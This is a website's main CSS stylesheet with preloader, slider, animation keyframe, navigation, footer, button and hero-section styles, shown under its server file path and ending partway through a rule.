/home/u503560585/domains/mscm.me/public_html/public/css/main.css
/* Editable */

#preloader {
  background-color: #262626;
  padding: 0;
  margin: 0;
  height: 100%;
  position: fixed;
  z-index: 99999;
  width: 100%;
  display: flex;
  align-items: center;
  justify-content: center;
  left: 0;
  top: 0;
}

#preloader img {
  -webkit-animation: scale 5s infinite;
          animation: scale 5s infinite;
  max-width: 200px;
}

@-webkit-keyframes scale {
  0% {
    transform: scale(1.1);
  }

  50% {
    transform: scale(1);
  }

  100% {
    transform: scale(1.1);
  }
}

@keyframes scale {
  0% {
    transform: scale(1.1);
  }

  50% {
    transform: scale(1);
  }

  100% {
    transform: scale(1.1);
  }
}

/* media queries */

/* device */

.text-main {
  color: #006b36 !important;
}

.text-secondary {
  color: #FFB629 !important;
}

.text-1 {
  color: #333 !important;
}

.text-title {
  color: #1c1f35 !important;
}

/* Slider */

/* Icons */

/* Arrows */

.slick-prev,
.slick-next {
  position: absolute;
  display: block;
  height: 20px;
  width: 20px;
  line-height: 0px;
  font-size: 0px;
  cursor: pointer;
  background: transparent;
  color: #000;
  top: 50%;
  transform: translate(0, -50%);
  padding: 0;
  border: none;
  outline: none;
  opacity: 0;
  z-index: 10;
  transition: 0.5s;
}

.slick-prev:hover,
.slick-prev:focus,
.slick-next:hover,
.slick-next:focus {
  outline: none;
  background: transparent;
  color: transparent;
  opacity: 1;
}

.slick-prev:hover:before,
.slick-prev:focus:before,
.slick-next:hover:before,
.slick-next:focus:before {
  opacity: 1;
}

.slick-prev.slick-disabled:before,
.slick-next.slick-disabled:before {
  opacity: 0.25;
}

.slick-prev:before,
.slick-next:before {
  content: "\F054";
  width: 25px;
  height: 25px;
  font-family: "fontAwesome";
  color: #000;
  font-size: 20px;
  line-height: 1;
  opacity: 0.75;
}

.slick-prev {
  left: -20px;
  transform: rotate(-180deg);
}

[dir=rtl] .slick-prev {
  left: auto;
  right: -50px;
}

.slick-next {
  right: -20px;
}

[dir=rtl] .slick-next {
  left: -50px;
  right: auto;
}

.slick-slider:hover .slick-prev {
  opacity: 1;
  left: -10px;
}

.slick-slider:hover .slick-next {
  right: -10px;
  opacity: 1;
}

/* Dots */

.slick-dots {
  position: absolute;
  bottom: -25px;
  list-style: none;
  display: none;
  text-align: center;
  padding: 0;
  margin: 0;
  width: 100%;
}

.slick-dots li {
  position: relative;
  display: inline-block;
  height: 10px;
  margin: 0 5px;
  padding: 0;
  cursor: pointer;
}

.slick-dots li button {
  border: 0;
  background: #e0e0e0;
  display: block;
  height: 6px;
  width: 6px;
  outline: none;
  line-height: 0px;
  font-size: 0px;
  color: transparent;
  padding: 3px;
  cursor: pointer;
  border-radius: 20px;
}

.slick-dots li button:hover,
.slick-dots li button:focus {
  outline: none;
}

.slick-dots li button:hover:before,
.slick-dots li button:focus:before {
  opacity: 1;
}

.slick-dots li.slick-active button {
  width: 20px;
  background: #006b36;
}

/* Slider */

.slick-slider {
  position: relative;
  display: block;
  box-sizing: border-box;
  -webkit-touch-callout: none;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  touch-action: pan-y;
  -webkit-tap-highlight-color: transparent;
}

.slick-list {
  position: relative;
  overflow: hidden;
  display: block;
  margin: 0;
  padding: 0;
}

.slick-list:focus {
  outline: none;
}

.slick-list.dragging {
  cursor: pointer;
  cursor: hand;
}

.slick-slider .slick-track,
.slick-slider .slick-list {
  transform: translate3d(0, 0, 0);
}

.slick-track {
  position: relative;
  left: 0;
  top: 0;
  display: block;
  margin-left: auto;
  margin-right: auto;
}

.slick-track:before,
.slick-track:after {
  content: "";
  display: table;
}

.slick-track:after {
  clear: both;
}

.slick-loading .slick-track {
  visibility: hidden;
}

.slick-slide {
  float: left;
  height: 100%;
  min-height: 1px;
  display: none;
}

[dir=rtl] .slick-slide {
  float: right;
}

.slick-slide img {
  display: block;
}

.slick-slide.slick-loading img {
  display: none;
}

.slick-slide.dragging img {
  pointer-events: none;
}

.slick-initialized .slick-slide {
  display: block;
}

.slick-loading .slick-slide {
  visibility: hidden;
}

.slick-vertical .slick-slide {
  display: block;
  height: auto;
  border: 1px solid transparent;
}

.slick-arrow.slick-hidden {
  display: none;
}

.tran,
.contact-item a,
.contact-item span,
.contact-item,
.client-item,
.live-tag .active,
.live-tag .item,
.courser-item:hover span,
.courser-item,
.breadcrumb,
.btn,
.footer ul li a,
#nav .right .phone-contact {
  transition: all 0.3s ease 0s;
}

.hidden {
  overflow: hidden;
}

section {
  overflow: hidden;
}

body {
  font-family: Raleway, sans-serif;
  background-color: #fff;
  color: #1c1f35;
  font-weight: 400;
  overflow-x: hidden;
  font-size: 16px;
  position: relative;
}

@media (max-width: 769px) {
  body {
    font-size: 15px;
  }
}

.noscroll {
  overflow: hidden;
  position: relative;
}

.container {
  max-width: 1350px;
}

section {
  position: relative;
  z-index: 1;
}

@media (max-width: 769px) {
  .desktop {
    display: none;
  }
}

.mobile {
  display: none;
}

@media (max-width: 769px) {
  .mobile {
    display: block;
  }
}

a {
  text-decoration: none;
}

.img {
  width: 100%;
}

/* Editable */

.loader-wrapper {
  background-color: #fff;
  padding: 0;
  margin: 0;
  height: 100%;
  position: fixed;
  z-index: 99999;
  width: 100%;
  display: flex;
  align-items: center;
  justify-content: center;
  left: 0;
  top: 0;
}

.loader-wrapper img {
  -webkit-animation: scale 5s infinite;
          animation: scale 5s infinite;
  max-width: 200px;
}

@keyframes scale {
  0% {
    transform: scale(1.1);
  }

  50% {
    transform: scale(1);
  }

  100% {
    transform: scale(1.1);
  }
}

.hover-img figure {
  position: relative;
  overflow: hidden;
  margin-bottom: 0;
}

.hover-img figure::before {
  position: absolute;
  top: 0;
  left: -75%;
  z-index: 2;
  display: block;
  content: "";
  width: 50%;
  height: 100%;
  background: linear-gradient(to right, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0.3) 100%);
  transform: skewX(-25deg);
}

.hover-img figure img {
  width: 100%;
  height: 100%;
  /*-o-object-fit: cover;*/
  /*   object-fit: cover;*/
}

.hover-img figure:hover::before {
  -webkit-animation: shine 0.75s;
  animation: shine 0.75s;
}

@-webkit-keyframes shine {
  100% {
    left: 125%;
  }
}

@keyframes shine {
  100% {
    left: 125%;
  }
}

.btn-coming {
  position: relative;
  display: block;
}

.btn-coming::before {
  content: "coming soon";
  position: absolute;
  bottom: -20px;
  color: #006b36;
  left: 0;
  font-size: 14px;
  width: 100%;
  text-align: center;
  opacity: 0;
  transition: 0.5s;
}

.btn-coming:hover::before {
  bottom: -30px;
  opacity: 1;
}

@-webkit-keyframes pulse-main-btn {
  0%, 20%, 40%, 60%, 100% {
    transform: scale(0.97);
  }

  10%, 30%, 50% {
    transform: scale(1.03);
  }
}

@keyframes pulse-main-btn {
  0%, 20%, 40%, 60%, 100% {
    transform: scale(0.97);
  }

  10%, 30%, 50% {
    transform: scale(1.03);
  }
}

@-webkit-keyframes blesk-main-btn {
  0%, 60% {
    transform: translateX(-100%);
  }

  85%, 100% {
    transform: translateX(100%);
  }
}

@keyframes blesk-main-btn {
  0%, 60% {
    transform: translateX(-100%);
  }

  85%, 100% {
    transform: translateX(100%);
  }
}

@-webkit-keyframes rotate-money {
  0% {
    transform: rotate(0deg);
  }

  100% {
    transform: rotate(360deg);
  }
}

@keyframes rotate-money {
  0% {
    transform: rotate(0deg);
  }

  100% {
    transform: rotate(360deg);
  }
}

@-webkit-keyframes pulse-stars {
  0%, 100% {
    transform: scale(0.8);
  }

  50% {
    transform: scale(1.2);
  }
}

@keyframes pulse-stars {
  0%, 100% {
    transform: scale(0.8);
  }

  50% {
    transform: scale(1.2);
  }
}

@-webkit-keyframes pulse-stars-2 {
  0%, 100% {
    transform: scale(0.97);
  }

  50% {
    transform: scale(1.03);
  }
}

@keyframes pulse-stars-2 {
  0%, 100% {
    transform: scale(0.97);
  }

  50% {
    transform: scale(1.03);
  }
}

@-webkit-keyframes heartBeat {
  0% {
    transform: scale(1);
  }

  14% {
    transform: scale(1.3);
  }

  28% {
    transform: scale(1);
  }

  42% {
    transform: scale(1.3);
  }

  70% {
    transform: scale(1);
  }
}

@keyframes heartBeat {
  0% {
    transform: scale(1);
  }

  14% {
    transform: scale(1.3);
  }

  28% {
    transform: scale(1);
  }

  42% {
    transform: scale(1.3);
  }

  70% {
    transform: scale(1);
  }
}

@-webkit-keyframes swimming-on-air {
  0%, 100% {
    transform: translate(0%, 0%);
  }

  20% {
    transform: translate(3%, 3%);
  }

  40% {
    transform: translate(3%, -3%);
  }

  60% {
    transform: translate(-3%, 3%);
  }

  80% {
    transform: translate(-3%, -3%);
  }
}

@keyframes swimming-on-air {
  0%, 100% {
    transform: translate(0%, 0%);
  }

  20% {
    transform: translate(3%, 3%);
  }

  40% {
    transform: translate(3%, -3%);
  }

  60% {
    transform: translate(-3%, 3%);
  }

  80% {
    transform: translate(-3%, -3%);
  }
}

@-webkit-keyframes jumping-on-trampolines {
  0%, 100% {
    transform: translateY(0%);
  }

  50% {
    transform: translateY(2%);
  }
}

@keyframes jumping-on-trampolines {
  0%, 100% {
    transform: translateY(0%);
  }

  50% {
    transform: translateY(2%);
  }
}

@-webkit-keyframes move-bike {
  0%, 100% {
    transform: translateX(-2vmax) rotate(-2deg);
  }

  50% {
    transform: translateX(2vmax) rotate(2deg);
  }
}

@keyframes move-bike {
  0%, 100% {
    transform: translateX(-2vmax) rotate(-2deg);
  }

  50% {
    transform: translateX(2vmax) rotate(2deg);
  }
}

@-webkit-keyframes move-fish {
  0% {
    opacity: 0;
    left: 0;
    transform: translateY(0%);
  }

  10% {
    opacity: 1;
    left: 10%;
    transform: translateY(0%);
  }

  25% {
    opacity: 1;
    left: 25%;
    transform: translateY(30%);
  }

  50% {
    opacity: 1;
    left: 50%;
    transform: translateY(0%);
  }

  75% {
    opacity: 1;
    left: 75%;
    transform: translateY(-30%);
  }

  90% {
    opacity: 1;
    left: 90%;
    transform: translateY(0%);
  }

  100% {
    opacity: 0;
    left: 100%;
    transform: translateY(0%);
  }
}

@keyframes move-fish {
  0% {
    opacity: 0;
    left: 0;
    transform: translateY(0%);
  }

  10% {
    opacity: 1;
    left: 10%;
    transform: translateY(0%);
  }

  25% {
    opacity: 1;
    left: 25%;
    transform: translateY(30%);
  }

  50% {
    opacity: 1;
    left: 50%;
    transform: translateY(0%);
  }

  75% {
    opacity: 1;
    left: 75%;
    transform: translateY(-30%);
  }

  90% {
    opacity: 1;
    left: 90%;
    transform: translateY(0%);
  }

  100% {
    opacity: 0;
    left: 100%;
    transform: translateY(0%);
  }
}

@-webkit-keyframes move-bubles {
  0% {
    opacity: 0;
    bottom: 0;
    transform: translateX(0%);
  }

  10% {
    opacity: 1;
    bottom: 10%;
    transform: translateX(0%);
  }

  25% {
    opacity: 1;
    bottom: 25%;
    transform: translateX(30%);
  }

  50% {
    opacity: 1;
    bottom: 50%;
    transform: translateX(0%);
  }

  75% {
    opacity: 1;
    bottom: 75%;
    transform: translateX(-30%);
  }

  90% {
    opacity: 1;
    bottom: 90%;
    transform: translateX(0%);
  }

  100% {
    opacity: 0;
    bottom: 100%;
    transform: translateX(0%);
  }
}

@keyframes move-bubles {
  0% {
    opacity: 0;
    bottom: 0;
    transform: translateX(0%);
  }

  10% {
    opacity: 1;
    bottom: 10%;
    transform: translateX(0%);
  }

  25% {
    opacity: 1;
    bottom: 25%;
    transform: translateX(30%);
  }

  50% {
    opacity: 1;
    bottom: 50%;
    transform: translateX(0%);
  }

  75% {
    opacity: 1;
    bottom: 75%;
    transform: translateX(-30%);
  }

  90% {
    opacity: 1;
    bottom: 90%;
    transform: translateX(0%);
  }

  100% {
    opacity: 0;
    bottom: 100%;
    transform: translateX(0%);
  }
}

@-webkit-keyframes shoes-swimming {
  0%, 50%, 100% {
    transform: translateY(0%);
  }

  25% {
    transform: translateY(2%);
  }

  75% {
    transform: translateY(-2%);
  }
}

@keyframes shoes-swimming {
  0%, 50%, 100% {
    transform: translateY(0%);
  }

  25% {
    transform: translateY(2%);
  }

  75% {
    transform: translateY(-2%);
  }
}

@-webkit-keyframes move-bg-threes {
  0% {
    transform: translateX(0);
  }

  100% {
    transform: translate(-100vw);
  }
}

@keyframes move-bg-threes {
  0% {
    transform: translateX(0);
  }

  100% {
    transform: translate(-100vw);
  }
}

@-webkit-keyframes move-app-active {
  0%, 100% {
    transform: rotate(-5deg);
  }

  50% {
    transform: rotate(5deg);
  }
}

@keyframes move-app-active {
  0%, 100% {
    transform: rotate(-5deg);
  }

  50% {
    transform: rotate(5deg);
  }
}

@-webkit-keyframes confetty {
  0% {
    opacity: 0;
    top: 0%;
  }

  10% {
    opacity: 1;
    top: 10%;
  }

  90% {
    opacity: 1;
    top: 90%;
  }

  100% {
    opacity: 0;
    top: 100%;
  }
}

@keyframes confetty {
  0% {
    opacity: 0;
    top: 0%;
  }

  10% {
    opacity: 1;
    top: 10%;
  }

  90% {
    opacity: 1;
    top: 90%;
  }

  100% {
    opacity: 0;
    top: 100%;
  }
}

@-webkit-keyframes bles-stars {
  0%, 100% {
    opacity: 0;
    transform: scale(0);
  }

  40%, 60% {
    opacity: 1;
    transform: scale(1);
  }
}

@keyframes bles-stars {
  0%, 100% {
    opacity: 0;
    transform: scale(0);
  }

  40%, 60% {
    opacity: 1;
    transform: scale(1);
  }
}

@-webkit-keyframes move-money-arrow {
  0% {
    left: 0;
  }

  100% {
    left: 100%;
  }
}

@keyframes move-money-arrow {
  0% {
    left: 0;
  }

  100% {
    left: 100%;
  }
}

@-webkit-keyframes walk {
  0%, 100% {
    transform: rotate(-2deg);
  }

  50% {
    transform: rotate(0deg);
  }
}

@keyframes walk {
  0%, 100% {
    transform: rotate(-2deg);
  }

  50% {
    transform: rotate(0deg);
  }
}

@-webkit-keyframes walk-hand {
  0%, 100% {
    transform: translate(0, 0) rotate(0deg);
  }

  25% {
    transform: translate(1%, 1%) rotate(1deg);
  }

  50% {
    transform: translate(0, 0) rotate(0deg);
  }

  75% {
    transform: translate(-1%, 1%) rotate(-1deg);
  }
}

@keyframes walk-hand {
  0%, 100% {
    transform: translate(0, 0) rotate(0deg);
  }

  25% {
    transform: translate(1%, 1%) rotate(1deg);
  }

  50% {
    transform: translate(0, 0) rotate(0deg);
  }

  75% {
    transform: translate(-1%, 1%) rotate(-1deg);
  }
}

@-webkit-keyframes marque {
  0% {
    transform: translateX(0%);
  }

  100% {
    transform: translateX(-50%);
  }
}

@keyframes marque {
  0% {
    transform: translateX(0%);
  }

  100% {
    transform: translateX(-50%);
  }
}

@-webkit-keyframes marque-back {
  0% {
    transform: translateX(-50%);
  }

  100% {
    transform: translateX(0%);
  }
}

@keyframes marque-back {
  0% {
    transform: translateX(-50%);
  }

  100% {
    transform: translateX(0%);
  }
}

@-webkit-keyframes move-tramps {
  0%, 17% {
    transform: translateX(0%);
  }

  34%, 51% {
    transform: translateX(100%);
  }

  68%, 85% {
    transform: translateX(200%);
  }

  100% {
    transform: translateX(300%);
  }
}

@keyframes move-tramps {
  0%, 17% {
    transform: translateX(0%);
  }

  34%, 51% {
    transform: translateX(100%);
  }

  68%, 85% {
    transform: translateX(200%);
  }

  100% {
    transform: translateX(300%);
  }
}

@-webkit-keyframes jump-on-tramps {
  0%, 100% {
    transform: translate(-6%, -3%);
  }

  50% {
    transform: translate(-6%, 3%);
  }
}

@keyframes jump-on-tramps {
  0%, 100% {
    transform: translate(-6%, -3%);
  }

  50% {
    transform: translate(-6%, 3%);
  }
}

@-webkit-keyframes wiggle {
  0%, 7% {
    transform: rotate(0);
  }

  15% {
    transform: rotate(-12deg);
  }

  20% {
    transform: rotate(7deg);
  }

  25% {
    transform: rotate(-6deg);
  }

  30% {
    transform: rotate(4deg);
  }

  35% {
    transform: rotate(-2deg);
  }

  40%, to {
    transform: rotate(0);
  }
}

@keyframes wiggle {
  0%, 7% {
    transform: rotate(0);
  }

  15% {
    transform: rotate(-12deg);
  }

  20% {
    transform: rotate(7deg);
  }

  25% {
    transform: rotate(-6deg);
  }

  30% {
    transform: rotate(4deg);
  }

  35% {
    transform: rotate(-2deg);
  }

  40%, to {
    transform: rotate(0);
  }
}

@-webkit-keyframes color {
  0% {
    background: #74C5BE;
  }

  50% {
    background: #DF924B;
  }

  100% {
    background: #74C5BE;
  }
}

@keyframes color {
  0% {
    background: #74C5BE;
  }

  50% {
    background: #DF924B;
  }

  100% {
    background: #74C5BE;
  }
}

#nav {
  left: 0;
  position: fixed;
  top: 0;
  width: 100%;
  z-index: 999;
  transition: 0.5s;
  background: rgba(23, 37, 69, 0.5);
}

@media (max-width: 769px) {
  #nav {
    padding: 0.25rem 0;
  }
}

#nav .nav-inner {
  align-items: center;
  display: flex;
  flex-flow: row wrap;
  align-items: center;
  justify-content: space-between;
  margin: 0 auto;
  position: relative;
  width: 100%;
  z-index: 1;
}

#nav .logo {
  color: #fff;
  font-size: 24px;
  font-weight: 700;
}

#nav .logo img {
  height: 60px;
}

@media (max-width: 769px) {
  #nav .logo {
    font-size: 16px;
  }
}

#nav .spaced {
  align-items: center;
  display: flex;
  flex-flow: row wrap;
  justify-content: flex-end;
  font-size: 1rem;
  list-style-type: none;
  margin: 0;
  padding-left: 0;
  position: relative;
  width: auto;
}

@media (max-width: 769px) {
  #nav .spaced {
    align-content: center;
    align-items: center;
    background: #006b36;
    display: flex;
    flex-direction: column;
    height: 100%;
    justify-content: start;
    left: 0;
    position: fixed;
    top: 0;
    pointer-events: none;
    width: 100%;
    transition: all 0.1s ease-in-out 0s;
    transform: translateX(100%);
    padding-top: 100px;
    opacity: 0;
  }
}

#nav .spaced li a {
  padding: 0 12px;
  color: #fff;
  font-weight: 500;
  font-size: 14px;
}

#nav .spaced li .btn {
  font-size: 16px;
  padding: 10px 80px;
  display: none;
}

@media (max-width: 769px) {
  #nav .spaced li .btn {
    font-size: 1.75rem;
    display: block;
  }
}

@media (max-width: 769px) {
  #nav .spaced li {
    margin-bottom: 0.625rem;
    padding-bottom: 0.625rem;
    padding-left: 0.3125rem;
    padding-right: 0.3125rem;
    width: 100%;
    border-bottom: solid 1px rgba(255, 255, 255, 0.15);
  }

  #nav .spaced li a {
    color: #eeeee4;
    font-size: 18px;
    font-weight: 700;
    padding: 0 15px;
  }
}

#nav .spaced .lang-btn {
  display: none;
  justify-content: center;
  margin-top: 20px;
}

@media (max-width: 769px) {
  #nav .spaced .lang-btn {
    display: flex;
  }
}

#nav .spaced .lang-btn img {
  width: 30px;
}

#nav .right {
  display: flex;
  align-items: center;
}

#nav .right .phone-contact {
  display: flex;
  align-items: center;
  font-family: Rubik;
  height: 60px;
  padding: 0 20px;
  color: white;
  background-color: #006b36;
  margin-right: 10px;
}

#nav .right .phone-contact:hover {
  background-color: #FFB629;
}

#nav .right .dropdown {
  margin-right: 10px;
}

#nav .right .dropdown img {
  width: 25px;
}

#nav .right .dropdown-item {
  font-size: 14px;
}

@media (max-width: 769px) {
  #nav .right {
    display: none;
  }
}

#nav .dropdown-s .dropdown-toggle {
  display: flex;
  align-items: center;
  gap: 4px;
}

@media (max-width: 769px) {
  #nav .dropdown-s .dropdown-toggle {
    justify-content: space-between;
  }
}

#nav .dropdown-s .dropdown-toggle .dropdown-a {
  padding-right: 0;
}

#nav .dropdown-s i {
  padding: 3px 10px 0 15px;
  color: #fff;
  position: absolute;
  right: 0;
  top: 0;
}

#nav .dropdown-s.open .dropdown-menu {
  display: block;
}

#nav .dropdown-s .dropdown-menu {
  min-width: 260px;
}

@media (max-width: 769px) {
  #nav .dropdown-s .dropdown-menu li {
    padding: 0;
    margin: 0;
  }
}

#nav .dropdown-s .dropdown-menu li:hover {
  background-color: #f4f7fb;
}

#nav .dropdown-s .dropdown-menu li a {
  font-size: 16px;
  color: #333;
  padding: 8px;
  display: block;
}

@media (max-width: 769px) {
  #nav .dropdown-s .dropdown-menu li a {
    font-weight: 500;
  }
}

#nav .dropdown-s .dropdown-menu.open {
  display: block;
}

@media (max-width: 769px) {
  #nav .dropdown-s .dropdown-menu.show {
    position: static !important;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
    transform: none !important;
  }

  #nav .dropdown-s .dropdown-menu.show li {
    border-bottom: none;
  }

  #nav .dropdown-s .dropdown-menu.show li a {
    padding: 0 15px;
    color: #fff;
  }
}

@media (min-width: 769px) {
  #nav .dropdown-s:hover .dropdown-menu {
    display: block;
  }
}

@media (max-width: 769px) {
  #menuToggle:checked + #mtoggle + .spaced {
    pointer-events: auto;
    transform: translateX(0);
    transition: all 0.2s ease-in-out 0s;
    opacity: 1;
  }
}

#nav.slide-up {
  transform: translateY(-100%);
}

#menuToggle {
  filter: alpha(opacity=0);
  height: 0;
  line-height: 0;
  opacity: 0;
  pointer-events: none;
  position: absolute;
  width: 0;
}

#menuToggle,
#mtoggle {
  -webkit-touch-callout: none;
  display: none;
  height: 3rem;
  margin-left: auto;
  margin-right: 0.625rem;
  position: relative;
  width: 2rem;
  z-index: 101;
}

@media (max-width: 769px) {
  #menuToggle,
  #mtoggle {
    display: block;
  }
}

#mtoggle span {
  background-color: #fff;
  display: block;
  height: 0.125rem;
  width: 100%;
}

#mtoggle span:first-child {
  margin-top: 0.875rem;
}

#mtoggle span:not(:last-child) {
  margin-bottom: 0.375rem;
}

#menuToggle:checked + #mtoggle span {
  background-color: #eeeee4;
}

#menuToggle:checked + #mtoggle span:nth-child(odd) {
  filter: alpha(opacity=0);
  opacity: 0;
}

.dropdown-menu {
  box-shadow: none;
  border-radius: 0;
  border: none;
}

.footer {
  background: #eefdf8;
}

.footer-inner {
  padding: 40px 20px 0;
}

@media (max-width: 769px) {
  .footer-inner {
    padding: 40px 8px;
  }
}

.footer p {
  color: #333;
  font-weight: 300;
}

.footer .logo img {
  max-height: 80px;
}

.footer .social-network {
  display: flex;
  padding: 0;
  flex-wrap: wrap;
}

.footer .social-network li {
  margin: 0 !important;
}

.footer .social-network li a {
  padding: 10px;
}

.footer .social-network li a i {
  font-size: 16px;
  color: #697077;
}

.footer ul {
  list-style: none;
}

.footer ul li {
  display: flex;
  align-items: center;
  margin-bottom: 10px;
}

.footer ul li:first-child {
  color: #333;
  font-size: 20px;
  font-weight: 600;
  margin-bottom: 24px;
}

@media (max-width: 769px) {
  .footer ul li:first-child {
    padding: 0;
    margin-top: 24px;
    margin-bottom: 24px;
  }
}

.footer ul li i {
  color: #333;
  margin-right: 10px;
  opacity: 0.6;
}

.footer ul li a {
  color: #333;
  font-size: 14px;
  font-weight: 300;
  display: inline-block;
  width: calc(100% - 35px);
}

.footer ul li a:hover {
  -webkit-text-decoration: dashed;
          text-decoration: dashed;
  transform: translateX(6px);
}

@media (max-width: 769px) {
  .footer ul {
    padding: 0;
  }
}

.footer-copyright {
  padding: 16px;
  border-top: solid 1px rgba(255, 255, 255, 0.4);
  margin-top: 32px;
  text-align: center;
  color: white;
}

.fs-10 {
  font-size: 10px;
}

.fs-11 {
  font-size: 11px;
}

.fs-12 {
  font-size: 12px;
}

.fs-13 {
  font-size: 13px;
}

.fs-14 {
  font-size: 14px;
}

.fs-15 {
  font-size: 15px;
}

.fs-16 {
  font-size: 16px;
}

.fs-17 {
  font-size: 17px;
}

.fs-18 {
  font-size: 18px;
}

.fs-19 {
  font-size: 19px;
}

.fs-20 {
  font-size: 20px;
}

.fs-21 {
  font-size: 21px;
}

.fs-22 {
  font-size: 22px;
}

.fs-23 {
  font-size: 23px;
}

.fs-24 {
  font-size: 24px;
}

.fs-25 {
  font-size: 25px;
}

.fs-26 {
  font-size: 26px;
}

.fs-27 {
  font-size: 27px;
}

.fs-28 {
  font-size: 28px;
}

.fs-29 {
  font-size: 29px;
}

.fs-30 {
  font-size: 30px;
}

.fs-31 {
  font-size: 31px;
}

.fs-32 {
  font-size: 32px;
}

.fs-33 {
  font-size: 33px;
}

.fs-34 {
  font-size: 34px;
}

.fs-35 {
  font-size: 35px;
}

.fs-36 {
  font-size: 36px;
}

.fs-37 {
  font-size: 37px;
}

.fs-38 {
  font-size: 38px;
}

.fs-39 {
  font-size: 39px;
}

.fs-40 {
  font-size: 40px;
}

.fs-41 {
  font-size: 41px;
}

.fs-42 {
  font-size: 42px;
}

.fs-43 {
  font-size: 43px;
}

.fs-44 {
  font-size: 44px;
}

.fs-45 {
  font-size: 45px;
}

.fs-46 {
  font-size: 46px;
}

.fs-47 {
  font-size: 47px;
}

.fs-48 {
  font-size: 48px;
}

.fs-49 {
  font-size: 49px;
}

.fs-50 {
  font-size: 50px;
}

.section-title {
  text-align: center;
  margin-bottom: 16px;
  font-weight: 700;
  font-size: 35px;
  color: #1c1f35;
  line-height: 54px;
}

@media (max-width: 769px) {
  .section-title {
    white-space: normal;
    line-height: 30px;
    font-size: 28px;
  }
}

.sub-title {
  color: #006b36;
  text-transform: uppercase;
  font-style: italic;
}

.section-content {
  line-height: 21px;
  letter-spacing: 0.0015em;
  text-align: center;
  max-width: 80%;
  margin: 0 auto;
}

@media (max-width: 769px) {
  .section-content {
    max-width: 100%;
    text-align: center;
  }
}

.btn {
  display: inline-flex;
  text-align: center;
  justify-content: center;
  align-items: center;
  vertical-align: middle;
  -webkit-user-select: none;
     -moz-user-select: none;
      -ms-user-select: none;
          user-select: none;
  border: none;
  padding: 5px 24px;
  border-radius: 0;
  background-color: transparent;
  position: relative;
  z-index: 1;
}

@media (max-width: 769px) {
  .btn {
    padding: 10px 16px;
  }
}

.btn-main {
  color: #fff;
  background-color: #006b36 !important;
  height: 50px;
}

.btn-main:hover {
  background-color: #FFB629 !important;
  color: #fff;
}

@media (max-width: 769px) {
  .btn-main {
    height: 35px;
  }
}

.btn-white {
  color: #006b36;
  background-color: white !important;
  height: 50px;
}

.btn-white i {
  margin-left: 5px;
}

.btn-white:hover {
  color: white;
  background-color: #FFB629 !important;
}

@media (max-width: 769px) {
  .btn-white {
    height: 35px;
  }
}

.gr-btn {
  display: flex;
  justify-content: center;
}

.gr-btn .btn + .btn {
  margin-left: 24px;
}

.scrollup {
  border-radius: 50%;
  bottom: 20px;
  font-size: 20px;
  position: fixed;
  width: 32px;
  height: 32px;
  bottom: 10px;
  right: 20px;
  background: rgba(0, 0, 0, 0.4);
  display: none;
  border-radius: 3px;
}

.breadcrumb {
  height: 380px;
  background: #006b36;
  overflow: hidden;
  position: relative;
  justify-content: center;
  margin-bottom: 0;
}

.breadcrumb-scroll {
  height: 255px;
}

@media (max-width: 769px) {
  .breadcrumb {
    height: 200px;
  }
}

.breadcrumb img {
  position: absolute;
  width: 100%;
  height: 100%;
  -o-object-fit: cover;
     object-fit: cover;
  opacity: 0.3;
}

.breadcrumb-inner {
  display: flex;
  height: 100%;
  flex-direction: column;
  justify-content: center;
  padding-top: 50px;
  position: absolute;
}

.breadcrumb-inner h1 {
  color: white;
  text-transform: uppercase;
  overflow: hidden;
  text-overflow: ellipsis;
  display: -webkit-box;
  -webkit-line-clamp: 2;
  /* number of lines to show */
  -webkit-box-orient: vertical;
  font-weight: 700;
}

@media (max-width: 769px) {
  .breadcrumb-inner h1 {
    font-size: 22px;
  }
}

.breadcrumb-inner a,
.breadcrumb-inner span {
  color: white;
  margin: 0 8px;
  white-space: nowrap;
}

.breadcrumb-inner .d-flex {
  flex-wrap: wrap;
}

.relate {
  margin-top: 30px;
  background-color: #eefdf8;
  list-style: none;
  padding: 24px;
  border-radius: 10px;
  margin-bottom: 24px;
}

.relate li {
  margin-bottom: 10px;
}

.relate li:first-child {
  font-size: 20px;
  font-weight: 700;
  margin-bottom: 24px;
}

.relate li a {
  color: #333;
}

.relate-item {
  display: flex;
}

.relate-item:hover {
  color: #006b36;
}

.relate-item img {
  width: 100px;
  height: 70px;
}

.relate-item-content {
  width: calc(100% - 100px);
  padding-left: 10px;
}

.relate-item-content p {
  font-size: 16px;
  font-weight: 700;
  margin-bottom: 0;
  overflow: hidden;
  text-overflow: ellipsis;
  display: -webkit-box;
  -webkit-line-clamp: 2;
  /* number of lines to show */
  -webkit-box-orient: vertical;
}

.relate-item-content span {
  font-size: 13px;
  margin-bottom: 0;
}

.hero {
  height: 850px;
}

@media (max-width: 769px) {
  .hero {
    margin-top: 68px;
  }
}

.hero-item-inner {
  position: relative;
  height: 850px;
  overflow: hidden;
}

.hero-item-inner img {
  width: 100%;
  height: 100%;
  -o-object-fit: cover;
     object-fit: cover;
  position: relative;
  z-index: 1;
}

.hero-item .content {
  position: absolute;
  z-index: 2;
  bottom: 50%;
  left: 0;
  right: 0;
}

.hero-item .content h1 {
  font-weight: 700;
  color: #fff;
  font-size: 60px;
}

@media (max-width: 769px) {
  .hero-item .content h1 {
    font-size: 40px;
  }
}

.hero-item .content h2 {
  color: #fff;
  font-size: 20px;
}

.hero .slick-arrow {
  background-color: #fff;
  height: 50px;
  width: 40px;
  z-index: 10;
  opacity: 0;
  font-family: "fontAwesome";
  border-radius: 0;
}

.hero:hover .slick-prev,
.hero:hover .slick-next {
  opacity: 1;
}

.about-grid {
  grid-column-gap: 50px;
  background-color: #fff;
  grid-template-rows: auto;
  margin-bottom: 100px;
  padding-top: 75px;
  padding-left: 45px;
  padding-right: 45px;
  z-index: 10;
  position: relative;
}

@media (max-width: 769px) {
  .about-grid {
    padding: 20px;
  }
}

.about-grid h1 {
  font-weight: 900;
}

.about-grid .content {
  grid-area: span 1/span 1/span 1/span 1;
}

.about-grid .about-content {
  position: relative;
  z-index: 3;
  padding-right: 50px;
}

@media (max-width: 769px) {
  .about-grid .about-content {
    padding-right: 0;
  }
}

.about-grid .about-image-wrap {
  position: relative;
  z-index: 2;
}

.about-grid .about-image-wrap img {
  width: 100%;
}

.about-grid .about-image-wrap .about-image {
  max-height: 200px;
  max-width: 200px;
  background-color: #fff;
  padding-top: 3%;
  padding-right: 3%;
  display: inline-block;
  position: absolute;
